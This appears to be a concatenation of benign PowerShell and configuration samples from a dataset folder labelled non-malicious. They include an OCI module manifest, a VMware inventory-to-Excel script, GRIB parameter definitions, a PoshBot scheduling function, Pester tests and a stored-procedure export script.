'Invoke-OCIOpsiSummarizeDatabaseInsightResourceUtilizationInsight',
'Invoke-OCIOpsiSummarizeDatabaseInsightTablespaceUsageTrend',
'Invoke-OCIOpsiSummarizeExadataInsightResourceCapacityTrend',
'Invoke-OCIOpsiSummarizeExadataInsightResourceCapacityTrendAggregated',
'Invoke-OCIOpsiSummarizeExadataInsightResourceForecastTrend',
'Invoke-OCIOpsiSummarizeExadataInsightResourceForecastTrendAggregated',
'Invoke-OCIOpsiSummarizeExadataInsightResourceStatistics',
'Invoke-OCIOpsiSummarizeExadataInsightResourceUsage',
'Invoke-OCIOpsiSummarizeExadataInsightResourceUsageAggregated',
'Invoke-OCIOpsiSummarizeExadataInsightResourceUtilizationInsight',
'Invoke-OCIOpsiSummarizeExadataMembers',
'Invoke-OCIOpsiSummarizeHostInsightDiskStatistics',
'Invoke-OCIOpsiSummarizeHostInsightHostRecommendation',
'Invoke-OCIOpsiSummarizeHostInsightNetworkUsageTrend',
'Invoke-OCIOpsiSummarizeHostInsightResourceCapacityTrend',
'Invoke-OCIOpsiSummarizeHostInsightResourceForecastTrend',
'Invoke-OCIOpsiSummarizeHostInsightResourceStatistics',
'Invoke-OCIOpsiSummarizeHostInsightResourceUsage',
'Invoke-OCIOpsiSummarizeHostInsightResourceUsageTrend',
'Invoke-OCIOpsiSummarizeHostInsightResourceUtilizationInsight',
'Invoke-OCIOpsiSummarizeHostInsightStorageUsageTrend',
'Invoke-OCIOpsiSummarizeHostInsightTopProcessesUsage',
'Invoke-OCIOpsiSummarizeHostInsightTopProcessesUsageTrend',
'Invoke-OCIOpsiSummarizeOperationsInsightsWarehouseResourceUsage',
'Invoke-OCIOpsiSummarizeSqlInsights',
'Invoke-OCIOpsiSummarizeSqlPlanInsights',
'Invoke-OCIOpsiSummarizeSqlResponseTimeDistributions',
'Invoke-OCIOpsiSummarizeSqlStatistics',
'Invoke-OCIOpsiSummarizeSqlStatisticsTimeSeries',
'Invoke-OCIOpsiSummarizeSqlStatisticsTimeSeriesByPlan',
'Move-OCIOpsiAutonomousDatabaseInsightAdvancedFeatures',
'Move-OCIOpsiAwrHubSourceCompartment',
'Move-OCIOpsiConfigurationCompartment',
'Move-OCIOpsiDatabaseInsightCompartment',
'Move-OCIOpsiEnterpriseManagerBridgeCompartment',
'Move-OCIOpsiExadataInsightCompartment',
'Move-OCIOpsiHostInsightCompartment',
'Move-OCIOpsiNewsReportCompartment',
'Move-OCIOpsiOperationsInsightsPrivateEndpointCompartment',
'Move-OCIOpsiOperationsInsightsWarehouseCompartment',
'Move-OCIOpsiPeComanagedDatabaseInsight', 'New-OCIOpsiAwrHub',
'New-OCIOpsiAwrHubSource', 'New-OCIOpsiConfiguration',
'New-OCIOpsiDatabaseInsight', 'New-OCIOpsiEnterpriseManagerBridge',
'New-OCIOpsiExadataInsight', 'New-OCIOpsiHostInsight',
'New-OCIOpsiNewsReport',
'New-OCIOpsiOperationsInsightsPrivateEndpoint',
'New-OCIOpsiOperationsInsightsWarehouse',
'New-OCIOpsiOperationsInsightsWarehouseUser',
'Remove-OCIOpsiAwrHub', 'Remove-OCIOpsiAwrHubObject',
'Remove-OCIOpsiAwrHubSource', 'Remove-OCIOpsiConfiguration',
'Remove-OCIOpsiDatabaseInsight',
'Remove-OCIOpsiEnterpriseManagerBridge',
'Remove-OCIOpsiExadataInsight', 'Remove-OCIOpsiHostInsight',
'Remove-OCIOpsiNewsReport',
'Remove-OCIOpsiOperationsInsightsPrivateEndpoint',
'Remove-OCIOpsiOperationsInsightsWarehouse',
'Remove-OCIOpsiOperationsInsightsWarehouseUser',
'Update-OCIOpsiAwrHub', 'Update-OCIOpsiAwrHubSource',
'Update-OCIOpsiConfiguration', 'Update-OCIOpsiDatabaseInsight',
'Update-OCIOpsiEnterpriseManagerBridge',
'Update-OCIOpsiExadataInsight', 'Update-OCIOpsiHostInsight',
'Update-OCIOpsiNewsReport',
'Update-OCIOpsiOperationsInsightsPrivateEndpoint',
'Update-OCIOpsiOperationsInsightsWarehouse',
'Update-OCIOpsiOperationsInsightsWarehouseUser',
'Write-OCIOpsiAwrHubObject'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Opsi'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/Get VMware Information.ps1
|
Get VMware Information.ps1
|
Get-VIServer YOURSERVER
$Excel = New-Object -Com Excel.Application
$Excel.visible = $True
$Excel = $Excel.Workbooks.Add()
$Addsheet = $Excel.sheets.Add()
$Sheet = $Excel.WorkSheets.Item(1)
$Sheet.Cells.Item(1,1) = "Name"
$Sheet.Cells.Item(1,2) = "Power State"
$Sheet.Cells.Item(1,3) = "Description"
$Sheet.Cells.Item(1,4) = "Number of CPUs"
$Sheet.Cells.Item(1,5) = "Memory (MB)"
$WorkBook = $Sheet.UsedRange
$WorkBook.Font.Bold = $True
$intRow = 2
$colItems = Get-VM | Select-Object -property "Name","PowerState","Description","NumCPU","MemoryMB"
foreach ($objItem in $colItems)
{
$Sheet.Cells.Item($intRow,1) = $objItem.Name
$powerstate = $objItem.PowerState
If ($PowerState -eq 1) {$power = "Powerd On"}
Else {$power = "Powerd Off"}
$Sheet.Cells.Item($intRow,2) = $power
$Sheet.Cells.Item($intRow,3) = $objItem.Description
$Sheet.Cells.Item($intRow,4) = $objItem.NumCPU
$Sheet.Cells.Item($intRow,5) = $objItem.MemoryMB
$intRow = $intRow + 1
}
$WorkBook.EntireColumn.AutoFit()
$Sheet = $Excel.WorkSheets.Item(2)
$Sheet.Cells.Item(1,1) = "Name"
$Sheet.Cells.Item(1,2) = "Free Space"
$Sheet.Cells.Item(1,3) = "Capacity"
$WorkBook = $Sheet.UsedRange
$WorkBook.Font.Bold = $True
$intRow = 2
$colItems = Get-Datastore | Select-Object -property "Name","FreeSpaceMB","CapacityMB"
foreach ($objItem in $colItems)
{
$Sheet.Cells.Item($intRow,1) = $objItem.Name
$Sheet.Cells.Item($intRow,2) = $objItem.FreeSpaceMB
$Sheet.Cells.Item($intRow,3) = $objItem.CapacityMB
$intRow = $intRow + 1
}
$WorkBook.EntireColumn.AutoFit()
$Sheet = $Excel.WorkSheets.Item(3)
$Sheet.Cells.Item(1,1) = "Name"
$Sheet.Cells.Item(1,2) = "State"
$WorkBook = $Sheet.UsedRange
$WorkBook.Font.Bold = $True
$intRow = 2
$colItems = Get-VMhost | Select-Object -property "Name","State"
foreach ($objItem in $colItems)
{
$Sheet.Cells.Item($intRow,1) = $objItem.Name
$state = $objItem.State
If ($state -eq 0) {$status = "Connected"}
Else {$status = "Disconnected"}
$Sheet.Cells.Item($intRow,2) = $status
$intRow = $intRow + 1
}
$WorkBook.EntireColumn.AutoFit()
|
combined_dataset/train/non-malicious/sample_39_57.ps1
|
sample_39_57.ps1
|
#Volumetric soil moisture content
'Proportion' = {
discipline = 2 ;
parameterCategory = 0 ;
parameterNumber = 9 ;
}
#Upper layer soil temperature
'K' = {
discipline = 2 ;
parameterCategory = 3 ;
parameterNumber = 1 ;
}
#Upper layer soil moisture
'kg m**-3' = {
discipline = 2 ;
parameterCategory = 3 ;
parameterNumber = 2 ;
}
#Lower layer soil moisture
'kg m**-3' = {
discipline = 2 ;
parameterCategory = 3 ;
parameterNumber = 3 ;
}
#Bottom layer soil temperature
'K' = {
discipline = 2 ;
parameterCategory = 3 ;
parameterNumber = 4 ;
}
#Liquid volumetric soil moisture (non-frozen)
'Proportion' = {
discipline = 2 ;
parameterCategory = 3 ;
parameterNumber = 5 ;
}
#Transpiration stress-onset (soil moisture)
'Proportion' = {
discipline = 2 ;
parameterCategory = 3 ;
parameterNumber = 7 ;
}
#Direct evaporation cease (soil moisture)
'Proportion' = {
discipline = 2 ;
parameterCategory = 3 ;
parameterNumber = 8 ;
}
#Soil porosity
'Proportion' = {
discipline = 2 ;
parameterCategory = 3 ;
parameterNumber = 9 ;
}
#Instantaneous eastward turbulent surface stress
'N m**-2' = {
discipline = 0 ;
parameterCategory = 2 ;
parameterNumber = 38 ;
typeOfFirstFixedSurface = 1 ;
}
#Instantaneous northward turbulent surface stress
'N m**-2' = {
discipline = 0 ;
parameterCategory = 2 ;
parameterNumber = 37 ;
typeOfFirstFixedSurface = 1 ;
}
#Evaporation in the last 6 hours
'kg m**-2' = {
discipline = 0 ;
parameterCategory = 1 ;
parameterNumber = 79 ;
typeOfFirstFixedSurface = 1 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 1 ;
lengthOfTimeRange = 6 ;
}
#Time-mean evapotranspiration rate in the last 24h
'kg m**-2 s**-1' = {
discipline = 2 ;
parameterCategory = 0 ;
parameterNumber = 39 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 0 ;
lengthOfTimeRange = 24 ;
}
#Time-integrated potential evapotranspiration rate in the last 24h
'kg m**-2' = {
discipline = 2 ;
parameterCategory = 0 ;
parameterNumber = 40 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 1 ;
lengthOfTimeRange = 24 ;
}
#Time-mean potential evapotranspiration rate in the last 24h
'kg m**-2 s**-1' = {
discipline = 2 ;
parameterCategory = 0 ;
parameterNumber = 40 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 0 ;
lengthOfTimeRange = 24 ;
}
#Time-mean volumetric soil moisture
'm**3 m**-3' = {
discipline = 2 ;
parameterCategory = 0 ;
parameterNumber = 25 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 0 ;
lengthOfTimeRange = 24 ;
}
#Time-integrated water runoff and drainage rate in the last 24h
'kg m**-2' = {
discipline = 2 ;
parameterCategory = 0 ;
parameterNumber = 42 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 1 ;
lengthOfTimeRange = 24 ;
}
#Time-mean water runoff and drainage rate in the last 24h
'kg m**-2 s**-1' = {
discipline = 2 ;
parameterCategory = 0 ;
parameterNumber = 42 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 0 ;
lengthOfTimeRange = 24 ;
}
#Time-mean snow depth water equivalent
'kg m**-2' = {
discipline = 0 ;
parameterCategory = 1 ;
parameterNumber = 60 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 0 ;
lengthOfTimeRange = 24 ;
}
#Time-mean skin temperature
'K' = {
discipline = 0 ;
parameterCategory = 0 ;
parameterNumber = 17 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 0 ;
lengthOfTimeRange = 24 ;
}
#Time-integrated snow melt rate in the last 24h
'kg m**-2' = {
discipline = 2 ;
parameterCategory = 0 ;
parameterNumber = 41 ;
indicatorOfUnitForTimeRange = 1 ;
typeOfStatisticalProcessing = 1 ;
lengthOfTimeRange = 24 ;
}
#Upward sea water velocity
'm s**-1' = {
discipline = 10 ;
parameterCategory = 4 ;
parameterNumber = 27 ;
typeOfFirstFixedSurface = 168 ;
typeOfSecondFixedSurface = 168 ;
}
#Time-mean upward sea water velocity
'm s**-1' = {
discipline = 10 ;
parameterCategory = 4 ;
parameterNumber = 27 ;
typeOfFirstFixedSurface = 168 ;
typeOfSecondFixedSurface = 168 ;
typeOfStatisticalProcessing = 0 ;
}
#Maximum individual wave height
'm' = {
discipline = 10 ;
parameterCategory = 0 ;
parameterNumber = 24 ;
}
|
combined_dataset/train/non-malicious/3347.ps1
|
3347.ps1
|
function New-ScheduledCommand {
[PoshBot.BotCommand(
Aliases = ('newschedule', 'new-schedule'),
Permissions = 'manage-schedules'
)]
[cmdletbinding(DefaultParameterSetName = 'repeat')]
param(
[parameter(Mandatory, ParameterSetName = 'repeat')]
[parameter(Mandatory, ParameterSetName = 'once')]
$Bot,
[parameter(Mandatory, Position = 0, ParameterSetName = 'repeat')]
[parameter(Mandatory, Position = 0, ParameterSetName = 'once')]
[ValidateNotNullOrEmpty()]
[string]$Command,
[parameter(Mandatory, Position = 1, ParameterSetName = 'repeat')]
[ValidateNotNull()]
[int]$Value,
[parameter(Mandatory, Position = 2, ParameterSetName = 'repeat')]
[ValidateSet('days', 'hours', 'minutes', 'seconds')]
[ValidateNotNullOrEmpty()]
[string]$Interval,
[parameter(ParameterSetName = 'repeat')]
[parameter(Mandatory, ParameterSetName = 'once')]
[ValidateScript({
if ($_ -as [datetime]) {
return $true
} else {
throw '''StartAfter'' must be a datetime.'
}
})]
[string]$StartAfter,
[parameter(Mandatory, ParameterSetName = 'once')]
[switch]$Once
)
if (-not $Command.StartsWith($Bot.Configuration.CommandPrefix)) {
$Command = $Command.Insert(0, $Bot.Configuration.CommandPrefix)
}
$botMsg = [Message]::new()
$botMsg.Text = $Command
$botMsg.From = $global:PoshBotContext.From
$botMsg.To = $global:PoshBotContext.To
if ($PSCmdlet.ParameterSetName -eq 'repeat') {
if ($PSBoundParameters.ContainsKey('StartAfter')) {
$schedMsg = [ScheduledMessage]::new($Interval, $value, $botMsg, [datetime]$StartAfter)
} else {
$schedMsg = [ScheduledMessage]::new($Interval, $value, $botMsg)
}
} elseIf ($PSCmdlet.ParameterSetName -eq 'once') {
$schedMsg = [ScheduledMessage]::new($botMsg, [datetime]$StartAfter)
}
try {
$Bot.Scheduler.ScheduleMessage($schedMsg)
if ($PSCmdlet.ParameterSetName -eq 'repeat') {
New-PoshBotCardResponse -Type Normal -Text "Command [$Command] with ID [$($schedMsg.Id)] scheduled at interval [$Value $($Interval.ToLower())]." -ThumbnailUrl $thumb.success
} elseIf ($PSCmdlet.ParameterSetName -eq 'once') {
New-PoshBotCardResponse -Type Normal -Text "Command [$Command] with ID [$($schedMsg.Id)] scheduled for one time at [$([datetime]$StartAfter)]." -ThumbnailUrl $thumb.success
}
} catch {
New-PoshBotCardResponse -Type Error -Text $_.ToString() -ThumbnailUrl $thumb.error
}
}
|
combined_dataset/train/non-malicious/1905.ps1
|
1905.ps1
|
Describe "Get-FormatData" -Tags "CI" {
Context "Check return type of Get-FormatData" {
It "Should return an object[] as the return type" {
$result = Get-FormatData
,$result | Should -BeOfType "System.Object[]"
}
}
It "Can get format data requiring '-PowerShellVersion 5.1'" {
$format = Get-FormatData System.IO.FileInfo -PowerShellVersion 5.1
$format.TypeNames | Should -HaveCount 2
$format.TypeNames[0] | Should -BeExactly "System.IO.DirectoryInfo"
$format.TypeNames[1] | Should -BeExactly "System.IO.FileInfo"
$format.FormatViewDefinition | Should -HaveCount 4
}
It "Should return nothing for format data requiring '-PowerShellVersion 5.1' and not provided" {
Get-FormatData System.IO.FileInfo | Should -BeNullOrEmpty
}
}
|
combined_dataset/train/non-malicious/3981.ps1
|
3981.ps1
|
function Assert-NotNullOrEmpty
{
param([string]$value)
Assert-False { [string]::IsNullOrEmpty($value) }
}
function Assert-IsInstance
{
param([object] $obj, [Type] $type)
Assert-AreEqual $obj.GetType() $type
}
function Assert-PropertiesCount
{
param([PSCustomObject] $obj, [int] $count)
$properties = $obj.PSObject.Properties
Assert-AreEqual $([System.Linq.Enumerable]::ToArray($properties).Count) $count
}
|
combined_dataset/train/non-malicious/Script-Proc_1.sql.ps1
|
Script-Proc_1.sql.ps1
|
#Copyright (c) 2011 Justin Dearing
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
# The authoritative version is https://github.com/justaprogrammer/PowerShellScripts/blob/master/Script-Proc.ps1.
# If you have a change I'd love to know about it to consider merging it into github.
param(
[string] $ProcedureName,
[string] $Path = "$($ProcedureName).sql",
[string] $ConnectionString = 'Data Source=.\\sqlexpress;Initial Catalog=master;Integrated Security=SSPI;'
);
try {
[System.Data.SqlClient.SqlConnection] $cn = New-Object System.Data.SqlClient.SqlConnection (,$ConnectionString);
$cn.Open() > $null;
$cmd = $cn.CreateCommand();
$cmd.CommandType = [System.Data.CommandType]::StoredProcedure;
$cmd.CommandText = 'sp_helptext';
$cmd.Parameters.AddWithValue('@objname', $ProcedureName) > $null;
[System.Data.IDataReader] $rdr = $cmd.ExecuteReader();
[string] $sproc_text = '';
while ($rdr.Read()) {
$sproc_text += $rdr[0];
}
$sproc_text | Out-File -FilePath $Path;
}
finally {
if ($cmd -ne $null) { $cmd.Dispose(); }
if ($cn -ne $null) { $cn.Dispose(); }
}
|
combined_dataset/train/non-malicious/sample_17_25.ps1
|
sample_17_25.ps1
|
ConvertFrom-StringData @'
id_hypervkb2263829check=Checking for KB2263829
id_hypervkb2263829checkdesc=Checking version of Hvax64.exe and other binaries
'@
# SIG # Begin signature block
# MIIoVAYJKoZIhvcNAQcCoIIoRTCCKEECAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCB4hX6LcStXvDa3
# iIHO9QPYShckV3UzXGbEGBaZ2Que06CCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiUwghohAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIPof
# lzYsbn+mM3iT/C8hDRAvzP3BOkl6+0Im9zczy0ZvMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAE0ulysUeb6miwQw8zQlIcfv8joWEKq9BuRx4
# OApBv55t9wjy6uUz38S7uPCrAxNIbloKTC1BLIACcBvo7h80S9KAOkgMvSH6nILQ
# GOsh+QoeAkKBy/T4AyAnyD4D4wezmzPEi5i9VJ1QfMefeIdmcfppeaSbD2dtWOpv
# QiVgsiO4UXdJTzs1o8NA0dDguUwSoqJDobvZZeVrXMJ/YqDlfBiPVO42t8cHpGes
# 497ZAqeqdIx0TEtkeANMcp5lbXFfz72zPb/E7qj8z4V8tO2c0FvwlmWbcl7kat2s
